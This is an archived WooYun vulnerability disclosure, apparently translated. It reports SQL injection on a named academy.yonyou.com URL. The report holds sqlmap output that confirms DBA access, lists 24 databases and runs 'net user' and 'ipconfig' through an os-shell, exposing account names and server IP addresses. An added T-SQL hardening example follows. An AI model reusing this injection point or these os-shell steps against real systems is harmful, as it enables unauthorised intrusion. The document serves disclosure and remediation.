WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2014-12-16: Details have been reported to the vendor and are awaiting the vendor's response.
2014-12-21: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Another one, then.
SQL injection URL:
http://academy.yonyou.com/ViewZsMap.aspx?der=zproducts&name=N
DBA privileges:
[22:33:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:33:38] [INFO] testing if current user is DBA
current user is DBA: True
[22:33:38] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\academy.yonyou.com'
[*] shutting down at 22:33:38
Databases:
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:34:10] [INFO] fetching database names
[22:34:11] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] JYSTimber_px
[*] master
[*] model
[*] msdb
[*] tempdb
[*] Timber_CP_EIS
[*] Timber_CP_ENT
[*] Timber_Exam_Gov
[*] Timber_Exam_Org_01
[*] Timber_Exam_Org_Wx
[*] Timber_Exam_Shangqi
[*] Timber_Exam_YL
[*] Timber_Live
[*] Timber_px
[*] Timber_PX_ENS
[*] Timber_PX_ENS2
[*] Timber_PX_ENS_AP
[*] Timber_PX_New_lexue_ceshi
[*] Timber_PX_New_YY
[*] Timber_PX_New_yy2
[*] Timber_PX_New_YY_Temp
[*] Timber_PX_YH
[*] Timber_PX_yonyou
[*] Timber_Tianming
[22:34:11] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\academy.yonyou.com'
[*] shutting down at 22:34:11
OS commands can be executed through the database, which allows privilege escalation:
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a] y
[22:35:30] [INFO] the SQL query used returns 8 entries
[22:35:31] [INFO] retrieved: " "
[22:35:31] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[22:35:31] [INFO] retrieved: "\\\\ ?????"
[22:35:31] [INFO] retrieved: " "
[22:35:31] [INFO] retrieved: "-----------------------------------------------..
[22:35:32] [INFO] retrieved: "Administrator \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?..
[22:35:32] [INFO] retrieved: "??????????????????"
[22:35:32] [INFO] retrieved: " "
[22:35:32] [INFO] retrieved: " "
command standard output:
---
\\ ?????

-------------------------------------------------------------------------------
Administrator            Guest
??????????????????
---
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] y
[22:35:49] [INFO] the SQL query used returns 38 entries
[22:35:49] [INFO] retrieved: " "
[22:35:50] [INFO] retrieved: "Windows IP ??"
[22:35:50] [INFO] retrieved: " "
[22:35:50] [INFO] retrieved: " "
[22:35:51] [INFO] retrieved: "?????? ????:"
[22:35:51] [INFO] retrieved: " "
[22:35:51] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:51] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..
[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0IPv4 ?? . . . . . . . . . . . . ..
[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0???? \\\\?a0. . . . . . . . . . ..
[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..
[22:35:53] [INFO] retrieved: " "
[22:35:53] [INFO] retrieved: "????? isatap.{8FFEDB7E-0A57-437F-A1CD-7F9A0F2EF..
[22:35:53] [INFO] retrieved: " "
[22:35:53] [INFO] retrieved: " \\\\?a0\\\\?a0???? \\\\?a0. . . . . . . . . . ..
[22:35:54] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:54] [INFO] retrieved: " "
[22:35:54] [INFO] retrieved: "????? 6TO4 Adapter:"
[22:35:55] [INFO] retrieved: " "
[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0IPv6 ?? . . . . . . . . . . . . ..
[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..
[22:35:56] [INFO] retrieved: " "
[22:35:56] [INFO] retrieved: "????? Teredo Tunneling Pseudo-Interface:"
[22:35:56] [INFO] retrieved: " "
[22:35:56] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0IPv6 ?? . . . . . . . . . . . . ..
[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..
[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..
[22:35:57] [INFO] retrieved: " "
[22:35:58] [INFO] retrieved: " "
[22:35:59] [INFO] retrieved: "Windows IP ??"
[22:35:59] [INFO] retrieved: " "
[22:35:59] [INFO] retrieved: " "
[22:35:59] [INFO] retrieved: "?????? ????:"
[22:36:00] [INFO] retrieved: " "
[22:36:00] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..
[22:36:00] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..
command standard output:
---
Windows IP ??

?????? ????:

   ????? DNS ?? . . . . . . . :
   ???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
   IPv4 ?? . . . . . . . . . . . . : 222.191.251.170
   ???? . . . . . . . . . . . . : 255.255.255.192
   ????. . . . . . . . . . . . . : 222.191.251.129

????? isatap.{8FFEDB7E-0A57-437F-A1CD-7F9A0F2EF9E4}:

   ???? . . . . . . . . . . . . : ?????
   ????? DNS ?? . . . . . . . :

????? 6TO4 Adapter:

   ????? DNS ?? . . . . . . . :
   IPv6 ?? . . . . . . . . . . . . : 2002:debf:fbaa::debf:fbaa
   ????. . . . . . . . . . . . . : 2002:c058:6301::c058:6301

????? Teredo Tunneling Pseudo-Interface:

   ????? DNS ?? . . . . . . . :
   IPv6 ?? . . . . . . . . . . . . : 2001:0:9d38:6ab8:1429:162f:2140:455
   ???? IPv6 ??. . . . . . . . : fe80::1429:162f:2140:455
   ????. . . . . . . . . . . . . :

Windows IP ??

?????? ????:

   ????? DNS ?? . . . . . . . :
   ???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839
---
os-shell>
Fix: reduce the database account's privileges and filter the input. Thanks again for your hard work, friends in Beijing.
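As an added example (not part of the original report or Yonyou's own code), the two fixes the author names, reducing privileges and filtering, written as T-SQL for the SQL Server 2005 back end identified above. It covers both the injectable ViewZsMap.aspx lookup and the os-shell finding: the web login loses sysadmin, xp_cmdshell is switched off, and the lookup becomes a parameterized stored procedure. The login name academy_web, the database placeholder, the table dbo.ZsMap with its columns, and the procedure dbo.usp_ViewZsMap are all assumptions; the report does not disclose the real schema.

```sql
-- Added hardening example; names marked HYPOTHETICAL are placeholders.
USE [master];
GO

-- 1. Least privilege: the site must not connect as a DBA.
--    Take the existing web login (placeholder) out of sysadmin; on 2005 the
--    stored procedure, not ALTER SERVER ROLE, is the available interface.
EXEC sp_dropsrvrolemember N'<existing-web-login-placeholder>', N'sysadmin';
GO

-- Dedicated low-privilege login for the ASP.NET site (HYPOTHETICAL name).
CREATE LOGIN [academy_web]
    WITH PASSWORD = N'<strong-password-placeholder>', CHECK_POLICY = ON;
GO

-- 2. Close the path sqlmap's os-shell used: command execution through the
--    engine depends on xp_cmdshell being enabled for a sysadmin session.
EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'xp_cmdshell', 0;
RECONFIGURE;
GO

-- 3. Map the login into the application database (placeholder name) and
--    grant nothing beyond EXECUTE on the one procedure the page needs.
USE [<app-database-placeholder>];
GO
CREATE USER [academy_web] FOR LOGIN [academy_web];
GO

-- HYPOTHETICAL table behind ViewZsMap.aspx?der=...&name=...
-- CREATE TABLE dbo.ZsMap (der NVARCHAR(50), name NVARCHAR(50), content NVARCHAR(MAX));

CREATE PROCEDURE dbo.usp_ViewZsMap
    @der  NVARCHAR(50),
    @name NVARCHAR(50)
AS
BEGIN
    SET NOCOUNT ON;
    -- Both query-string values arrive as typed parameters. A quote, comment
    -- marker or keyword inside them is compared as data, never parsed as SQL,
    -- which is the "filtering" the report asks for, done by the engine.
    SELECT content
    FROM dbo.ZsMap
    WHERE der = @der AND name = @name;
END;
GO

GRANT EXECUTE ON dbo.usp_ViewZsMap TO [academy_web];
GO

-- 4. Verification, run while connected as academy_web:
--    both queries should return 0 once the change is in place.
SELECT IS_SRVROLEMEMBER(N'sysadmin') AS is_sysadmin;
SELECT CAST(value_in_use AS INT) AS xp_cmdshell_enabled
FROM sys.configurations
WHERE name = N'xp_cmdshell';
```

The ASP.NET page then calls dbo.usp_ViewZsMap with SqlParameter objects rather than building the statement from Request.QueryString; with the login limited to EXECUTE on that procedure, even a residual injection elsewhere no longer reaches xp_cmdshell or the other 23 databases listed above.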
Severity: no impact; vendor ignored
Ignored on: 2014-12-21 14:20
None